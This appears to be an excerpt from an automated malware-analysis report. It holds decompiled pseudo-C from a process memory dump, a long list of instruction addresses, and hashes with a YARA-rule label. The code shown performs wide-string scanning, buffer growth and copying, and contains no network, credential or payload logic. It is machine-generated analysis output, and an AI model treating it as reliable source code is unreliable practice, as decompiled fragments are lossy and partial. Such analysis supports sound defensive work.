												if(_t374 >= 0x7fffffff) {
													goto L149;
												} else {
													goto L145;
												}
											}
											goto L180;
										}
										asm("bsf ecx, ecx");
										_t452 = _v36;
										_t377 = (_t465 >> 1) + _t336;
										_t466 = _v32;
										goto L159;
									}
								}
								L56:
								_t326 = _t325 - _t463;
								__eflags = _t326;
								_t327 = _t326 >> 1;
								if(_t326 != 0) {
									__eflags = _t463;
									if(_t463 == 0) {
										_t401 = 0;
									} else {
										_t291 = _t463 & 0x0000000f;
										__eflags = _t291;
										if(_t291 == 0) {
											L71:
											_t401 =  ~( ~_t291 + 0x00000007 & 0x00000007) + 0x7fffffff;
											__eflags = _t401;
											while(1) {
												asm("movdqu xmm1, [esi+eax*2]");
												asm("pcmpeqw xmm1, xmm0");
												asm("pmovmskb edi, xmm1");
												__eflags = _t448;
												if(_t448 != 0) {
													break;
												}
												_t291 = _t291 + 8;
												__eflags = _t291 - _t401;
												if(_t291 < _t401) {
													continue;
												} else {
													__eflags = _t401 - 0x7fffffff;
													if(_t401 >= 0x7fffffff) {
														goto L77;
													} else {
														goto L75;
													}
												}
												goto L78;
											}
											asm("bsf edx, edi");
											_t401 = (_t401 >> 1) + _t291;
										} else {
											_t401 = 0;
											__eflags = _t291 & 0x00000001;
											if((_t291 & 0x00000001) != 0) {
												while(1) {
													L75:
													__eflags =  *(_t463 + _t401 * 2) & 0x0000ffff;
													if(( *(_t463 + _t401 * 2) & 0x0000ffff) == 0) {
														goto L78;
													}
													_t401 = _t401 + 1;
													__eflags = _t401 - 0x7fffffff;
													if(_t401 < 0x7fffffff) {
														continue;
													} else {
														L77:
														_t401 = 0x7fffffff;
													}
													goto L78;
												}
											} else {
												_t291 =  ~_t291 + 0x10 >> 1;
												__eflags = _t291;
												while(1) {
													_t448 =  *(_t463 + _t401 * 2) & 0x0000ffff;
													__eflags = _t448;
													if(_t448 == 0) {
														goto L78;
													}
													_t401 = _t401 + 1;
													__eflags = _t401 - _t291;
													if(_t401 < _t291) {
														continue;
													} else {
														goto L71;
													}
													goto L78;
												}
											}
										}
									}
									L78:
									_t264 = _t401 >> 0x0000001f & _t401;
									_t402 = _t401 - _t264;
									__eflags = _t327;
									if(_t327 < 0) {
										L80:
										_t327 = _t402;
									} else {
										__eflags = _t327 - _t402;
										if(_t327 > _t402) {
											goto L80;
										}
									}
									_t403 = _a4;
									_t449 = _t463 + _t264 * 2;
									 *_t403 = 0;
									 *((intOrPtr*)(_t403 + 4)) = 0;
									__eflags = _t449;
									if(_t449 == 0) {
										L116:
										_push(0x80);
										_t317 = E003B1030();
										_t481 = _t481 + 4;
										_t268 =  *_a4;
										__eflags = _t268;
										if(_t268 == 0) {
											__eflags = 0;
											 *_t317 = 0;
										} else {
											__eflags = _t317;
											if(_t317 != 0) {
												_t404 =  *_t268 & 0x0000ffff;
												 *_t317 = _t404;
												__eflags = _t404;
												if(_t404 != 0) {
													_t405 = 0;
													__eflags = 0;
													while(1) {
														_t405 = _t405 + 1;
														_t359 =  *(_t268 + _t405 * 4 - 2) & 0x0000ffff;
														 *(_t317 + _t405 * 4 - 2) = _t359;
														__eflags = _t359;
														if(_t359 == 0) {
															goto L122;
														}
														_t360 =  *(_t268 + _t405 * 4) & 0x0000ffff;
														 *(_t317 + _t405 * 4) = _t360;
														__eflags = _t360;
														if(_t360 != 0) {
															continue;
														}
														goto L122;
													}
												}
											}
											L122:
											_push(2);
											_push(_t268);
											E003B10B0();
											_t481 = _t481 + 8;
										}
										goto L124;
									} else {
										_t271 =  *_t449 & 0x0000ffff;
										__eflags = _t271;
										if(_t271 == 0) {
											goto L116;
										} else {
											__eflags = _t327;
											if(_t327 == 0) {
												_t417 = _t449 & 0x0000000f;
												__eflags = _t417;
												if(_t417 == 0) {
													L89:
													_t327 =  ~( ~_t417 + 0x00000007 & 0x00000007) + 0x7fffffff;
													__eflags = _t327;
													while(1) {
														asm("movdqu xmm1, [edi+edx*2]");
														asm("pcmpeqw xmm1, xmm0");
														asm("pmovmskb eax, xmm1");
														__eflags = _t271;
														if(_t271 != 0) {
															break;
														}
														_t417 = _t417 + 8;
														__eflags = _t417 - _t327;
														if(_t417 < _t327) {
															continue;
														} else {
															__eflags = _t327 - 0x7fffffff;
															if(_t327 >= 0x7fffffff) {
																goto L95;
															} else {
																goto L93;
															}
														}
														goto L96;
													}
													asm("bsf ebx, eax");
													_t327 = (_t327 >> 1) + _t417;
												} else {
													_t327 = 0;
													__eflags = _t417 & 0x00000001;
													if((_t417 & 0x00000001) != 0) {
														while(1) {
															L93:
															__eflags =  *(_t449 + _t327 * 2) & 0x0000ffff;
															if(( *(_t449 + _t327 * 2) & 0x0000ffff) == 0) {
																goto L96;
															}
															_t327 = _t327 + 1;
															__eflags = _t327 - 0x7fffffff;
															if(_t327 < 0x7fffffff) {
																continue;
															} else {
																L95:
																_t327 = 0x7fffffff;
															}
															goto L96;
														}
													} else {
														_t417 =  ~_t417 + 0x10 >> 1;
														__eflags = _t417;
														while(1) {
															_t271 =  *(_t449 + _t327 * 2) & 0x0000ffff;
															__eflags = _t271;
															if(_t271 == 0) {
																goto L96;
															}
															_t327 = _t327 + 1;
															__eflags = _t327 - _t417;
															if(_t327 < _t417) {
																continue;
															} else {
																goto L89;
															}
															goto L96;
														}
													}
												}
											}
											L96:
											_t114 = _t327 + 1; // 0x80000000
											_t406 = _t114;
											__eflags = _t406 - 0x40;
											_t407 =  <=  ? 0x40 : _t406;
											__eflags = _t407;
											if(_t407 > 0) {
												_t277 = (_t407 >> 5 >> 0x1a) + _t407 >> 6;
												_t408 = _t407 & 0x8000003f;
												__eflags = _t408;
												if(_t408 < 0) {
													_t408 = (_t408 - 0x00000001 | 0xffffffc0) + 1;
													__eflags = _t408;
												}
												__eflags = _t408;
												_t278 = _t277 + (0 | _t408 > 0x00000000);
												_v68 = _t278 << 6;
												_push(_t278 << 7);
												_t464 = E003B1030();
												_t481 = _t481 + 4;
												_t411 =  *_a4;
												__eflags = _t411;
												if(_t411 == 0) {
													__eflags = 0;
													 *_t464 = 0;
												} else {
													__eflags = _t464;
													if(_t464 != 0) {
														_t287 =  *_t411 & 0x0000ffff;
														 *_t464 = _t287;
														__eflags = _t287;
														if(_t287 != 0) {
															_t288 = 0;
															__eflags = 0;
															while(1) {
																_t288 = _t288 + 1;
																_t363 =  *(_t411 + _t288 * 4 - 2) & 0x0000ffff;
																 *(_t464 + _t288 * 4 - 2) = _t363;
																__eflags = _t363;
																if(_t363 == 0) {
																	goto L106;
																}
																_t364 =  *(_t411 + _t288 * 4) & 0x0000ffff;
																 *(_t464 + _t288 * 4) = _t364;
																__eflags = _t364;
																if(_t364 != 0) {
																	continue;
																}
																goto L106;
															}
														}
													}
													L106:
													_push(2);
													_push(_t411);
													E003B10B0();
													_t481 = _t481 + 8;
												}
												_t412 = _a4;
												_t412[1] = _v68;
												 *_t412 = _t464;
											} else {
												_t464 = 0;
											}
											__eflags = _t464;
											if(_t464 != 0) {
												_t284 = 0;
												while(1) {
													_t413 =  *_t449 & 0x0000ffff;
													_t284 = _t284 + 1;
													 *_t464 = _t413;
													__eflags = _t327;
													if(_t327 == 0) {
														goto L114;
													}
													__eflags = _t284 - _t327;
													if(_t284 == _t327) {
														 *(_t464 + 2) = 0;
													} else {
														goto L114;
													}
													goto L125;
													L114:
													__eflags = _t413;
													if(_t413 != 0) {
														_t464 = _t464 + 2;
														_t449 = _t449 + 2;
														__eflags = _t449;
														continue;
													}
													goto L125;
												}
											}
										}
									}
								} else {
									_t426 = _a4;
									_push(0x80);
									 *_t426 = 0;
									 *((intOrPtr*)(_t426 + 4)) = 0;
									_t317 = E003B1030();
									_t481 = _t481 + 4;
									_t298 =  *_a4;
									__eflags = _t298;
									if(_t298 == 0) {
										 *_t317 = 0;
									} else {
										__eflags = _t317;
										if(_t317 != 0) {
											_t427 =  *_t298 & 0x0000ffff;
											 *_t317 = _t427;
											__eflags = _t427;
											if(_t427 != 0) {
												_t428 = 0;
												__eflags = 0;
												while(1) {
													_t428 = _t428 + 1;
													_t365 =  *(_t298 + _t428 * 4 - 2) & 0x0000ffff;
													 *(_t317 + _t428 * 4 - 2) = _t365;
													__eflags = _t365;
													if(_t365 == 0) {
														goto L63;
													}
													_t366 =  *(_t298 + _t428 * 4) & 0x0000ffff;
													 *(_t317 + _t428 * 4) = _t366;
													__eflags = _t366;
													if(_t366 != 0) {
														continue;
													}
													goto L63;
												}
											}
										}
										L63:
										_push(2);
										_push(_t298);
										E003B10B0();
										_t481 = _t481 + 8;
									}
									L124:
									_t250 = _a4;
									 *_t250 = _t317;
									_t250[1] = 0x40;
								}
								goto L125;
							}
							L157:
							_t463 = _v40;
							goto L56;
						}
					} else {
						goto L40;
					}
				}
				L125:
				_push(2);
				_push(_v64);
				E003B10B0();
				_v64 = 0;
				_v60 = 0;
				return _a4;
				goto L180;
			}

0x003bae8e
0x003bae92
0x003bae94
0x003bae98
0x003baea2
0x003baea4
0x003baea7
0x003baead
0x003baee7
0x003baee9
0x003baeaf
0x003baeb1
0x003baeb3
0x003baeb6
0x003baebb
0x003baebf
0x003baebf
0x003baec0
0x003baec5
0x003baecc
0x00000000
0x00000000
0x003baece
0x003baed2
0x003baed8
0x00000000
0x00000000
0x00000000
0x003baed8
0x003baebf
0x003baebb
0x003baeda
0x003baeda
0x003baedc
0x003baedd
0x003baee2
0x003baee2
0x003baef0
0x003baef8
0x003baefe
0x003baf09
0x003baf0b
0x003bb6df
0x003bb6e4
0x003baf11
0x003baf13
0x003baf13
0x003baf16
0x003baf36
0x003baf3a
0x003baf46
0x003baf46
0x003baf4c
0x003baf4c
0x003baf51
0x003baf55
0x003baf59
0x003baf5b
0x00000000
0x00000000
0x003baf61
0x003baf64
0x003baf66
0x00000000
0x003baf68
0x003baf68
0x003baf6e
0x00000000
0x00000000
0x00000000
0x00000000
0x003baf6e
0x00000000
0x003baf66
0x003bb6d3
0x003bb6d8
0x00000000
0x003baf18
0x003baf18
0x003baf1a
0x003baf1c
0x003baf70
0x003baf70
0x003baf74
0x003baf76
0x00000000
0x00000000
0x003baf7c
0x003baf7d
0x003baf83
0x00000000
0x003baf85
0x003baf85
0x003baf85
0x003baf8a
0x003baf8a
0x00000000
0x003baf83
0x00000000
0x003baf1e
0x003baf23
0x003baf23
0x003baf25
0x003baf25
0x003baf29
0x003baf2b
0x00000000
0x00000000
0x003baf31
0x003baf32
0x003baf34
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003baf34
0x003bb458
0x003bb458
0x003bb45b
0x003bb46b
0x003bb45d
0x003bb45f
0x003bb462
0x003bb462
0x003bb45b
0x003baf1c
0x003baf16
0x003baf8f
0x003baf94
0x003baf94
0x003baf97
0x003baf9a
0x003baf9d
0x003baf9f
0x003bafb4
0x003bafb7
0x003bafb7
0x003bafbd
0x003bafc5
0x003bafc5
0x003bafc5
0x003bafc6
0x003bafd0
0x003bafd7
0x003bafd8
0x003bafe0
0x003bafe2
0x003bafe5
0x003bafe9
0x003bafeb
0x003bb033
0x003bb035
0x003bafed
0x003bafed
0x003bafef
0x003baff1
0x003baff4
0x003baff7
0x003baff9
0x003baffb
0x003baffe
0x003baffe
0x003bb000
0x003bb000
0x003bb001
0x003bb006
0x003bb00b
0x003bb00d
0x00000000
0x00000000
0x003bb00f
0x003bb013
0x003bb017
0x003bb019
0x00000000
0x00000000
0x00000000
0x003bb019
0x003bb01b
0x003bb01b
0x003baff9
0x003bb01e
0x003bb020
0x003bb021
0x003bb025
0x003bb02a
0x003bb02e
0x003bb02e
0x003bb038
0x003bb03c
0x003bafa1
0x003bafa1
0x003bafa1
0x003bb044
0x003bb048
0x003bb04e
0x003bb052
0x003baf00
0x003baf00
0x003baf00
0x003bb057
0x003bb059
0x003bb05f
0x003bb068
0x003bb068
0x003bb06d
0x003bb072
0x003bb074
0x003bb07c
0x003bb07e
0x003bb084
0x003bb088
0x003bb0c7
0x003bb08a
0x003bb08c
0x003bb08e
0x003bb091
0x003bb096
0x003bb098
0x003bb09a
0x003bb09a
0x003bb09b
0x003bb0a0
0x003bb0a7
0x00000000
0x00000000
0x003bb0a9
0x003bb0ad
0x003bb0b3
0x00000000
0x00000000
0x00000000
0x003bb0b3
0x003bb09a
0x003bb096
0x003bb0b5
0x003bb0b5
0x003bb0b7
0x003bb0b8
0x003bb0bd
0x003bb0bd
0x00000000
0x003bb061
0x003bb061
0x003bb066
0x003bb0cf
0x003bb0d5
0x003bb0da
0x003bb0dc
0x003bb66c
0x003bb671
0x003bb676
0x003bb678
0x003bb680
0x003bb682
0x003bb688
0x003bb68a
0x003bb68c
0x003bb6cb
0x003bb68e
0x003bb68e
0x003bb690
0x003bb692
0x003bb695
0x003bb698
0x003bb69a
0x003bb69c
0x003bb69c
0x003bb69e
0x003bb69e
0x003bb69f
0x003bb6a4
0x003bb6a9
0x003bb6ab
0x00000000
0x00000000
0x003bb6ad
0x003bb6b1
0x003bb6b5
0x003bb6b7
0x00000000
0x00000000
0x00000000
0x003bb6b7
0x003bb69e
0x003bb69a
0x003bb6b9
0x003bb6b9
0x003bb6bb
0x003bb6bc
0x003bb6c1
0x003bb6c1
0x00000000
0x003bb0e2
0x003bb0e6
0x003bb0e9
0x003bb0ec
0x003bb0ef
0x003bb0f3
0x003bb0f6
0x003bb0f9
0x003bb10a
0x003bb10e
0x003bb112
0x003bb116
0x003bb116
0x003bb118
0x003bb11c
0x003bb11c
0x003bb11e
0x003bb120
0x003bb120
0x003bb123
0x00000000
0x00000000
0x003bb12d
0x003bb12f
0x00000000
0x003bb135
0x003bb135
0x003bb139
0x003bb13b
0x003bb13e
0x003bb13e
0x003bb144
0x003bb147
0x003bb14d
0x003bb150
0x003bb154
0x003bb15b
0x003bb15e
0x003bb161
0x00000000
0x00000000
0x003bb16b
0x003bb16d
0x00000000
0x003bb16f
0x003bb16f
0x003bb16f
0x003bb172
0x003bb172
0x00000000
0x003bb16d
0x003bb49c
0x003bb4a0
0x003bb4a4
0x003bb4a8
0x003bb4ba
0x003bb4ba
0x003bb4bc
0x003bb4be
0x00000000
0x00000000
0x003bb4c0
0x003bb4c0
0x003bb4c2
0x003bb4c4
0x003bb537
0x003bb537
0x003bb53b
0x003bb53f
0x003bb543
0x003bb545
0x00000000
0x00000000
0x003bb54b
0x003bb54c
0x003bb552
0x00000000
0x003bb554
0x003bb554
0x00000000
0x003bb554
0x00000000
0x003bb552
0x003bb64d
0x00000000
0x003bb4c6
0x003bb4c6
0x003bb4ca
0x003bb4cc
0x003bb4d0
0x003bb4d4
0x003bb4d8
0x003bb4da
0x00000000
0x00000000
0x003bb4e0
0x003bb4e1
0x003bb4e3
0x00000000
0x003bb4e5
0x003bb4e5
0x003bb4e9
0x00000000
0x003bb4e9
0x00000000
0x003bb4e3
0x003bb5c5
0x003bb5c9
0x003bb5cd
0x003bb5cd
0x003bb5cf
0x003bb558
0x003bb558
0x00000000
0x003bb5d1
0x003bb5d1
0x003bb55d
0x003bb55d
0x003bb561
0x003bb561
0x003bb563
0x003bb567
0x003bb56b
0x003bb56f
0x003bb56f
0x003bb57a
0x003bb57e
0x003bb584
0x003bb587
0x003bb58d
0x003bb593
0x003bb596
0x003bb599
0x00000000
0x00000000
0x003bb59d
0x003bb59f
0x003bb5ab
0x003bb5ab
0x003bb5af
0x003bb5af
0x003bb5b1
0x00000000
0x003bb5a1
0x003bb5a1
0x003bb5a2
0x003bb5a6
0x00000000
0x00000000
0x00000000
0x00000000
0x003bb5a6
0x00000000
0x003bb59f
0x003bb5e2
0x003bb5e6
0x003bb5ea
0x003bb5f0
0x003bb5f0
0x003bb5f3
0x00000000
0x003bb5f9
0x003bb5fd
0x003bb5ff
0x00000000
0x003bb605
0x003bb605
0x003bb609
0x003bb609
0x003bb60b
0x003bb60f
0x003bb613
0x003bb617
0x003bb617
0x003bb621
0x003bb624
0x003bb62a
0x003bb631
0x003bb634
0x003bb637
0x003bb63a
0x00000000
0x00000000
0x003bb644
0x003bb646
0x00000000
0x003bb648
0x00000000
0x003bb648
0x00000000
0x003bb646
0x003bb4ae
0x003bb4b2
0x003bb4b6
0x003bb4ba
0x003bb4bc
0x003bb4be
0x00000000
0x00000000
0x003bb4be
0x003bb5ff
0x003bb5d3
0x003bb5d3
0x003bb5d7
0x003bb5d9
0x003bb5dd
0x003bb5b4
0x003bb5b4
0x003bb5b6
0x00000000
0x00000000
0x00000000
0x00000000
0x003bb5b6
0x003bb5d1
0x003bb5cf
0x00000000
0x003bb4ed
0x003bb4f9
0x003bb4fd
0x003bb4fd
0x003bb503
0x003bb50b
0x003bb50b
0x003bb510
0x003bb514
0x003bb518
0x003bb51a
0x00000000
0x00000000
0x003bb520
0x003bb523
0x003bb525
0x00000000
0x003bb527
0x003bb527
0x003bb52b
0x003bb52f
0x003bb535
0x00000000
0x00000000
0x00000000
0x00000000
0x003bb535
0x00000000
0x003bb525
0x003bb658
0x003bb65d
0x003bb661
0x003bb663
0x00000000
0x003bb663
0x003bb4ba
0x003bb176
0x003bb176
0x003bb176
0x003bb178
0x003bb17a
0x003bb1e3
0x003bb1e5
0x003bb495
0x003bb1eb
0x003bb1ed
0x003bb1ed
0x003bb1f0
0x003bb20c
0x003bb218
0x003bb218
0x003bb21e
0x003bb21e
0x003bb223
0x003bb227
0x003bb22b
0x003bb22d
0x00000000
0x00000000
0x003bb233
0x003bb236
0x003bb238
0x00000000
0x003bb23a
0x003bb23a
0x003bb240
0x00000000
0x00000000
0x00000000
0x00000000
0x003bb240
0x00000000
0x003bb238
0x003bb489
0x003bb48e
0x003bb1f2
0x003bb1f2
0x003bb1f4
0x003bb1f6
0x003bb242
0x003bb242
0x003bb246
0x003bb248
0x00000000
0x00000000
0x003bb24a
0x003bb24b
0x003bb251
0x00000000
0x003bb253
0x003bb253
0x003bb253
0x003bb253
0x00000000
0x003bb251
0x003bb1f8
0x003bb1fd
0x003bb1fd
0x003bb1ff
0x003bb1ff
0x003bb203
0x003bb205
0x00000000
0x00000000
0x003bb207
0x003bb208
0x003bb20a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003bb20a
0x003bb1ff
0x003bb1f6
0x003bb1f0
0x003bb258
0x003bb25d
0x003bb25f
0x003bb261
0x003bb263
0x003bb269
0x003bb269
0x003bb265
0x003bb265
0x003bb267
0x00000000
0x00000000
0x003bb267
0x003bb26b
0x003bb26e
0x003bb273
0x003bb275
0x003bb278
0x003bb27a
0x003bb3d0
0x003bb3d0
0x003bb3da
0x003bb3dc
0x003bb3e2
0x003bb3e4
0x003bb3e6
0x003bb420
0x003bb422
0x003bb3e8
0x003bb3e8
0x003bb3ea
0x003bb3ec
0x003bb3ef
0x003bb3f2
0x003bb3f4
0x003bb3f6
0x003bb3f6
0x003bb3f8
0x003bb3f8
0x003bb3f9
0x003bb3fe
0x003bb403
0x003bb405
0x00000000
0x00000000
0x003bb407
0x003bb40b
0x003bb40f
0x003bb411
0x00000000
0x00000000
0x00000000
0x003bb411
0x003bb3f8
0x003bb3f4
0x003bb413
0x003bb413
0x003bb415
0x003bb416
0x003bb41b
0x003bb41b
0x00000000
0x003bb280
0x003bb280
0x003bb283
0x003bb285
0x00000000
0x003bb28b
0x003bb28b
0x003bb28d
0x003bb291
0x003bb291
0x003bb294
0x003bb2b1
0x003bb2bd
0x003bb2bd
0x003bb2c3
0x003bb2c3
0x003bb2c8
0x003bb2cc
0x003bb2d0
0x003bb2d2
0x00000000
0x00000000
0x003bb2d8
0x003bb2db
0x003bb2dd
0x00000000
0x003bb2df
0x003bb2df
0x003bb2e5
0x00000000
0x00000000
0x00000000
0x00000000
0x003bb2e5
0x00000000
0x003bb2dd
0x003bb47d
0x003bb482
0x003bb296
0x003bb296
0x003bb298
0x003bb29b
0x003bb2e7
0x003bb2e7
0x003bb2eb
0x003bb2ed
0x00000000
0x00000000
0x003bb2ef
0x003bb2f0
0x003bb2f6
0x00000000
0x003bb2f8
0x003bb2f8
0x003bb2f8
0x003bb2f8
0x00000000
0x003bb2f6
0x003bb29d
0x003bb2a2
0x003bb2a2
0x003bb2a4
0x003bb2a4
0x003bb2a8
0x003bb2aa
0x00000000
0x00000000
0x003bb2ac
0x003bb2ad
0x003bb2af
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003bb2af
0x003bb2a4
0x003bb29b
0x003bb294
0x003bb2fd
0x003bb302
0x003bb302
0x003bb305
0x003bb308
0x003bb30b
0x003bb30d
0x003bb320
0x003bb323
0x003bb323
0x003bb329
0x003bb331
0x003bb331
0x003bb331
0x003bb332
0x003bb33c
0x003bb346
0x003bb349
0x003bb34f
0x003bb351
0x003bb357
0x003bb359
0x003bb35b
0x003bb395
0x003bb397
0x003bb35d
0x003bb35d
0x003bb35f
0x003bb361
0x003bb364
0x003bb367
0x003bb369
0x003bb36b
0x003bb36b
0x003bb36d
0x003bb36d
0x003bb36e
0x003bb373
0x003bb378
0x003bb37a
0x00000000
0x00000000
0x003bb37c
0x003bb380
0x003bb384
0x003bb386
0x00000000
0x00000000
0x00000000
0x003bb386
0x003bb36d
0x003bb369
0x003bb388
0x003bb388
0x003bb38a
0x003bb38b
0x003bb390
0x003bb390
0x003bb39a
0x003bb3a0
0x003bb3a3
0x003bb30f
0x003bb30f
0x003bb30f
0x003bb3a5
0x003bb3a7
0x003bb3ad
0x003bb3b7
0x003bb3b7
0x003bb3ba
0x003bb3bb
0x003bb3be
0x003bb3c0
0x00000000
0x00000000
0x003bb3c2
0x003bb3c4
0x003bb477
0x00000000
0x00000000
0x00000000
0x00000000
0x003bb3ca
0x003bb3ca
0x003bb3cc
0x003bb3b1
0x003bb3b4
0x003bb3b4
0x00000000
0x003bb3b4
0x00000000
0x003bb3cc
0x003bb3b7
0x003bb3a7
0x003bb285
0x003bb17c
0x003bb17c
0x003bb181
0x003bb186
0x003bb188
0x003bb190
0x003bb192
0x003bb198
0x003bb19a
0x003bb19c
0x003bb1db
0x003bb19e
0x003bb19e
0x003bb1a0
0x003bb1a2
0x003bb1a5
0x003bb1a8
0x003bb1aa
0x003bb1ac
0x003bb1ac
0x003bb1ae
0x003bb1ae
0x003bb1af
0x003bb1b4
0x003bb1b9
0x003bb1bb
0x00000000
0x00000000
0x003bb1bd
0x003bb1c1
0x003bb1c5
0x003bb1c7
0x00000000
0x00000000
0x00000000
0x003bb1c7
0x003bb1ae
0x003bb1aa
0x003bb1c9
0x003bb1c9
0x003bb1cb
0x003bb1cc
0x003bb1d1
0x003bb1d1
0x003bb425
0x003bb425
0x003bb428
0x003bb42a
0x003bb42a
0x00000000
0x003bb17a
0x003bb5bc
0x003bb5bc
0x00000000
0x003bb5bc
0x00000000
0x00000000
0x00000000
0x003bb066
0x003bb431
0x003bb431
0x003bb433
0x003bb437
0x003bb441
0x003bb445
0x003bb455
0x00000000

Strings

@, xrefs: 003BAEF0

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 8b23dda31ef708b485797a559140a73a4bae187a5af7111d082972d0fb887ed3
Instruction ID: 9d6c31dee4a77a704f86efd069a1bdef2e096fbccb174b2c58b85fe56f2da52b
Opcode Fuzzy Hash: 8b23dda31ef708b485797a559140a73a4bae187a5af7111d082972d0fb887ed3
Instruction Fuzzy Hash: 3E4219716047128BC7258F29C4912BBB3E2BFD4718F19862DEA958BB95EFB4DC41C341

Uniqueness

Uniqueness Score: -1.00%

Function 003BB6F0, Relevance: 2.0, Strings: 1, Instructions: 704
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E003BB6F0(signed int __ecx, void* __eflags, signed int* _a4, signed int _a8) {
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed short* _t217;
				unsigned int _t225;
				signed int _t226;
				signed short** _t231;
				signed short* _t235;
				signed int* _t237;
				signed int _t242;
				signed int _t246;
				signed int _t254;
				signed int _t257;
				signed int _t259;
				signed int _t261;
				signed int _t262;
				intOrPtr* _t263;
				signed int _t266;
				signed int _t269;
				unsigned int _t275;
				signed int _t276;
				void* _t282;
				signed int _t285;
				signed int _t286;
				signed int _t290;
				signed int _t291;
				signed int _t293;
				signed int _t300;
				signed int _t301;
				signed int _t306;
				signed int _t307;
				signed int _t310;
				signed int _t319;
				signed int _t321;
				signed int _t335;
				signed int _t338;
				signed int _t339;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t355;
				void* _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				void* _t368;
				signed int _t369;
				signed int _t370;
				signed int _t373;
				intOrPtr* _t375;
				signed int _t376;
				signed int _t377;
				signed int _t378;
				intOrPtr* _t379;
				signed int _t380;
				signed int _t381;
				signed int _t383;
				unsigned int _t385;
				unsigned int _t386;
				unsigned int _t389;
				signed int _t390;
				signed int _t397;
				signed int _t400;
				signed int _t401;
				void* _t402;
				signed int _t403;
				signed int _t404;
				signed int _t407;
				signed int* _t408;
				signed int _t409;
				signed int _t413;
				signed int _t422;
				signed int _t424;
				signed short* _t425;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t433;
				signed int _t434;
				signed int _t435;
				signed int _t436;
				signed int _t438;
				signed int _t444;
				signed int _t446;
				signed int _t448;
				signed int _t451;
				signed int _t452;
				signed int _t456;
				signed int _t457;
				signed int _t458;
				void* _t461;

				_v52 = 0;
				_t438 = __ecx;
				_v48 = 0;
				_push(0x80);
				_t422 = E003B1030();
				_t461 = (_t458 & 0xfffffff0) - 0x34 + 4;
				_t217 = _v52;
				if(_t217 == 0) {
					__eflags = 0;
					 *_t422 = 0;
					L8:
					_v48 = 0x40;
					_v52 = _t422;
					if((_a8 & 0x0000ffff) != 0) {
						__eflags = _t422;
						if(_t422 == 0) {
							_t338 = 0x40;
							_t300 = 0;
							L23:
							_t24 = _t300 + 2; // -2147483652
							_t368 = _t24;
							__eflags = _t368 - 0x40;
							_t369 =  <=  ? 0x40 : _t368;
							__eflags = _t338 - _t369;
							if(_t338 < _t369) {
								_t225 = (_t369 >> 5 >> 0x1a) + _t369 >> 6;
								_t370 = _t369 & 0x8000003f;
								__eflags = _t370;
								if(_t370 < 0) {
									_t370 = (_t370 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t370;
								}
								__eflags = _t370;
								_t226 = _t225 + (0 | _t370 > 0x00000000);
								_push(_t226 << 7);
								_t424 = _t226 << 6;
								_t373 = E003B1030();
								_t461 = _t461 + 4;
								_t339 = _v52;
								__eflags = _t339;
								if(_t339 == 0) {
									__eflags = 0;
									 *_t373 = 0;
									goto L36;
								} else {
									__eflags = _t373;
									if(_t373 == 0) {
										L34:
										_push(2);
										_push(_t339);
										_v68 = _t373;
										E003B10B0();
										_t373 = _v68;
										_t461 = _t461 + 8;
										L36:
										_v48 = _t424;
										_v52 = _t373;
										L37:
										 *((short*)(_t373 + _t300 * 2)) = _a8 & 0x0000ffff;
										__eflags = 0;
										_t231 =  &_v52;
										 *((short*)(_v52 + 2 + _t300 * 2)) = 0;
										L38:
										_t425 =  *_t231;
										if(_t425 == 0) {
											L40:
											_t375 = _a4;
											_push(0x80);
											 *_t375 = 0;
											 *((intOrPtr*)(_t375 + 4)) = 0;
											_t301 = E003B1030();
											_t461 = _t461 + 4;
											_t235 =  *_a4;
											if(_t235 == 0) {
												 *_t301 = 0;
												L61:
												_t237 = _a4;
												 *_t237 = _t301;
												_t237[1] = 0x40;
												L62:
												_push(2);
												_push(_v52);
												E003B10B0();
												_v52 = 0;
												_v48 = 0;
												return _a4;
											}
											if(_t301 == 0) {
												L46:
												_push(2);
												_push(_t235);
												E003B10B0();
												_t461 = _t461 + 8;
												goto L61;
											}
											_t376 =  *_t235 & 0x0000ffff;
											 *_t301 = _t376;
											if(_t376 == 0) {
												goto L46;
											}
											_t377 = 0;
											while(1) {
												_t377 = _t377 + 1;
												_t341 =  *(_t235 + _t377 * 4 - 2) & 0x0000ffff;
												 *(_t301 + _t377 * 4 - 2) = _t341;
												if(_t341 == 0) {
													goto L46;
												}
												_t342 =  *(_t235 + _t377 * 4) & 0x0000ffff;
												 *(_t301 + _t377 * 4) = _t342;
												if(_t342 != 0) {
													continue;
												}
												goto L46;
											}
											goto L46;
										}
										_t378 =  *_t425 & 0x0000ffff;
										if(_t378 != 0) {
											_t242 =  *_t438;
											__eflags = _t242;
											if(_t242 == 0) {
												L53:
												_t379 = _a4;
												_push(0x80);
												 *_t379 = 0;
												 *((intOrPtr*)(_t379 + 4)) = 0;
												_t301 = E003B1030();
												_t461 = _t461 + 4;
												_t246 =  *_a4;
												__eflags = _t246;
												if(_t246 == 0) {
													__eflags = 0;
													 *_t301 = 0;
													goto L61;
												}
												__eflags = _t301;
												if(_t301 == 0) {
													L59:
													_push(2);
													_push(_t246);
													E003B10B0();
													_t461 = _t461 + 8;
													goto L61;
												}
												_t380 =  *_t246 & 0x0000ffff;
												 *_t301 = _t380;
												__eflags = _t380;
												if(_t380 == 0) {
													goto L59;
												}
												_t381 = 0;
												__eflags = 0;
												while(1) {
													_t381 = _t381 + 1;
													_t343 =  *(_t246 + _t381 * 4 - 2) & 0x0000ffff;
													 *(_t301 + _t381 * 4 - 2) = _t343;
													__eflags = _t343;
													if(_t343 == 0) {
														goto L59;
													}
													_t344 =  *(_t246 + _t381 * 4) & 0x0000ffff;
													 *(_t301 + _t381 * 4) = _t344;
													__eflags = _t344;
